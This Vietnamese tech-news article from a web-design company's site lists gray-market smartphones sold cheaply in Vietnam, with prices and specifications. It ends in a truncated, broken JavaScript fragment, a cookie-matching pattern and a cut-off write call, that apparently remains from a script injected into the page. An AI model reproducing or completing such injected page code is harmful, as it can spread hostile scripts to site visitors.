Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Những smartphone xách tay giá mềm nhất tại VN

Những smartphone xách tay giá mềm nhất tại VN

Các sản phẩm xách tay như LG Optimus LTE3 với mức giá 5.6 triệu đồng, hay Sony Xperia V với giá 7 triệu đồng đều có mức giá rất tốt so với các thông số kỹ thuật mà chúng đang sở hữu.

Trên thực tế,những dòng điện thoại xách ta luôn chiếm số lượng lớn trên thị trường di động Việt. Ưu điểm của những sản phẩm này là chúng thường xuất hiện sớm và được bán ra với giá thấp hơn hàng triệu đồng so với hàng chính hãng khi nguồn cung đã đi vào ổn định.

Dưới đây là một số mẫu smartphone xách tay giá tốt hiện nay:

LG Optimus LTE3 (5,6 triệu đồng)

LG Optimus LTE3

Model này hay còn gọi là Optimus F7, là một trong những chiếc smartphone thuộc tầm trung sáng giá nhất hiện nay, giá bán ra của nó đang ở mức thấp. Mẫu điện thoại này được ra mắt hồi đầu năm, cấu hình khá ấn tượng với màn hình 4.7 inch True HD cho độ phân giải 720 x 1280 pixel. Máy được trang bị chip lõi kép 1.5 GHz, RAM 2 GB, sản phẩm này đủ sức đáp ứng được những yêu cầu cao về mặt tốc độ xử lý cũng như chạy đa nhiệm.

Là một model hướng vào phân khúc tầm trung của năm 2013 nên dung lượng lưu trữ của máy chỉ có 8 GB, camera cảm biến 8 chấm.

Samsung Galaxy Nexus (5,2 triệu đồng)

Samsung Galaxy Nexus

Ra mắt cách đây gần 2 năm, Galaxy Nexus dù không còn là hàng “đinh” nhưng vẫn nhận được sự săn đón của người dùng bới nó đơn giản, cấu hình khá tốt. Và quan trọng hơn nữa, người dùng Nexus luôn tự hào với việc họ là những người đầu tiên được trải nghiệm các phiên bản Android mới. Máy được trang bị màn hình 4.65 inch HD, chip lõi kép tốc độ 1.2 GHz, RAM 1 GB, máy có độ mỏng khoảng 8.9 mm và phần thân cong đẹp mắt.

HTC One X (7 triệu đồng)

HTC One X

Cách đây 1 năm, HTC One X được đánh giá là chiếc smartphone Android mạnh mẽ nhất với giá bán ra là 16 triệu đồng. Tính đến thởi điểm hiện tại, đối với hàng xách tay thì người chỉ phải bỏ ra khoảng 7 triệu đồng. Đây là một trong những mẫu điện thoại lõi tứ có giá tốt nhất hiện nay. Về chất lượng màn hình và camera thì One X không hề thua kém so với các sản phẩm cao cấp nhất hiện nay.

LG Optimus G (7 triệu đồng)

LG Optumus G chính hãng

Model chính hãng hiện vẫn đang được bán với giá 10.5 – 11 triệu đồng nhưng với thị trường hàng xách tay, người dùng có thể tìm được các địa chỉ bán sản phẩm này chỉ với giá 7 triệu đồng. Optimus G được xem là smartphone Android mạnh mẽ nhất của năm 2012, bao gồm chip lõi ts Snapdradon S4 Pro, màn hình 4.7 inch, camera 8 hoặc 13 chấm tùy từng phiên bản cho từng thị trường. Sản phẩm được thiết kế mang tính rất hiện đại với phần nắp lưng có các chấm phản quang đẹp mắt.

Sony Xperia V (7 triệu đồng)

Điện thoại Sony Xperia V

So với giá bán 10 triệu đồng của máy chính hãng thì bạn chỉ việc bỏ ra khoảng 7 triệu để sở hữu Xperia V. Những người đã từng dùng điện thoại Sony đề có chung qua điểm về việc, smartphone Xperia có thế mạnh về giải trí đa phương tiện như chụp ảnh, nghe nhạc, xem video. Máy sở hữu màn hình 4.3 inch, viền kim loại, có khả năng chống nước, hiệu năng xử lý ngang ngửa với chiếc HTC One X.

Sony Xperia Z (gần 12 triệu đồng)

Smartphone cao cấp Xperia Z

Đây là model thuộc dòng cao cấp duy nhất có mặt trong danh sách này. Với chiếc chiếc Z chính hãng hay Galaxy S4, HTC One đều có giá xấp xỉ 16 triệu đồng thì việc tiết kiệm được 4 triệu đồng trong khi vẫn sở hữu trong tay một sản phẩm cao cấp bậc nhất, rõ ràng đây là một món hời đối với tất cả người dùng. Sony sẽ ra mắt khá nhiều model Xperia trong năm nay nhưng có lẽ Z sẽ là chiếc điện thoại toàn diện nhất với một thiết kế đẹp, hiệu năng mạnh mẽ và khả năng chống nước thuộc hàng “độc”.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘